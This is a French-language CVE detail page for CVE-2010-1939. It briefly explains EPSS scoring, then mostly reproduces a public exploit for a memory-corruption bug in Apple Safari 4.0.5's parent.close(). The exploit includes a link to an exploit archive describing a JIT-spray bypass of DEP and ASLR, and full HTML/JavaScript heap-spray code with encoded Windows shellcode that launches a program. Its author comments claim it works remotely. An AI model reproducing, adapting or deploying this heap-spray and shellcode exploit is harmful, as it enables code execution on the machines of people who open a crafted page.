CVE-2010-1939 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12614.zip (safari_parent_close_sintsov.zip) Unzip and run START.htm This exploit use JIT-SPRAY for DEP and ASLR bypass. jit-shellcode: system("notepad") 0day.html - use 0x09090101 address for CALL JITed shellcode. START.htm -> iff.htm -> if1.htm -> 0day.html | | | | JIT-SPRAY parent.close(); 0x09090101 - JITed * ESI=0x09090101 shellcode * CALL ESI By Alexey Sintsov from Digital Security Research Group [www.dsecrg.com]

<!-- Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit Bug discovered by Krystian Kloskowski (h07) <[email protected]> Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command (calc) Local: Yes Remote: Yes (POPUP must be enabled [Ctrl+Shift+K]) Just for fun ;) --> <!---------------------------------REMOTE.htm--------------------------------- <script> window.open("0day.htm"); //parent.close() activation self.close(); </script> -----------------------------------REMOTE.htm--------------------------------> <!---------------------------------0day.htm----------------------------------> <h1>Alt + F4 :)</h1> <script> function make_buf(payload, len) { while(payload.length < (len * 2)) payload += payload; payload = payload.substring(0, len); return payload; } var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc) "%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+ "%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+ "%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+ "%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+ "%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+ "%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<1000;i++) memory[i] = block + shellcode; var a = parent; var buf = make_buf("AAAA", 10000); for(var i = 0; i <= 1; i++) { a.prompt(alert); a.prompt(buf); a.close(); } </script> <!---------------------------------0day.htm---------------------------------->